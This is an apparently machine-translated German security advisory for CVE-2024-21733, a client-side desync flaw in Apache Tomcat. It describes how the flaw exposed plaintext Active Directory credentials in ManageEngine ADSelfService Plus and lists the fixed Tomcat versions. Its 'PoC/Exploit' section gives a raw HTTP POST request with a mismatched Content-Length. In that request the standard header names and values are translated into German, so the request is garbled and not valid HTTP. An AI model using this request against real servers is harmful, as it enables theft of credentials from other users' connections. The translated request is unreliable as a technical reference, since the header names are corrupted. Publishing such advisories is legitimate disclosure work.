Beschreibungen
Apache Tomcat® ist eine quelloffene Implementierung von Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations und Jakarta Authentication Specification. Spezifikation für die Authentifizierung.
Apache Tomcat von 8.5.7 bis 8.5.63 und von 9.0.0-M11 bis 9.0.43 ist anfällig für clientseitige Desynchronisationsangriffe (CSD).
beeinflussen (in der Regel nachteilig)
Eine Sicherheitslücke im Zusammenhang mit der clientseitigen De-Synchronisierung (CSD) tritt auf, wenn ein Webserver nicht in der Lage ist, die Länge des Inhalts einer POST-Anforderung genau zu verarbeiten. Durch dieses Problem kann ein Angreifer den Browser des Opfers so manipulieren, dass er die Verbindung zur Website falsch abbricht. Diese Manipulation kann zu einer unbefugten Extraktion sensibler Daten aus Server- und Client-Verbindungen führen.
Der Schweregrad der Auswirkungen hängt von der Anwendung ab, die Tomcat als Back-End-Webserver verwendet und möglicherweise vertrauliche Informationen wie Klartext-Anmeldedaten preisgibt. So fand unser Team beispielsweise einen Fall in einer Version des ADSelfService Plus-Portals von ManageEngine vor Version 6304, bei dem es möglich war, Active Directory-Anmeldedaten im Klartext von einer Client-Verbindung zu erhalten, wie unten dargestellt.
PoC/Exploit
POST / HTTP/1.1
Host: Hostname
Sec-Ch-Ua: "Chrom";v="119″, "Not?A_Brand";v="24″
Sec-Ch-Ua-Mobil: ?0
Sec-Ch-Ua-Plattform: "Linux"
Upgrade-Insecure-Anfragen: 1
Benutzer-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, wie Gecko) Chrome/119.0.6045.159 Safari/537.36
Akzeptiert: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.7
Sec-Fetch-Site: keine
Sec-Fetch-Mode: navigieren
Sec-Fetch-Benutzer: ?1
Sec-Fetch-Dest: Dokument
Akzeptanz-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priorität: u=0, i
Verbindung: keep-alive
Inhalt-Länge: 6
Inhalt-Typ: anwendung/x-www-form-urlencoded
X
Verschreibung
Benutzer der betroffenen Versionen sollten eine der folgenden Abhilfemaßnahmen ergreifen:
Aufrüstung auf Apache Tomcat 9.0.44 oder höher
Aufrüstung auf Apache Tomcat 8.5.64 oder höher
Quelle: xer0dayz von Sn1perSecurity LLC meldete diese Schwachstelle an das Tomcat-Sicherheitsteam.
Historie: 2024-01-19 Ursprüngliche Mitteilung
Vollständiges Sicherheitsbulletin: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
bibliographie
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
Originalartikel von Chief Security Officer, bei Vervielfältigung bitte angeben: https://cncso.com/de/cve-2024-21733-apache-tomcat-http-request-smuggling-html
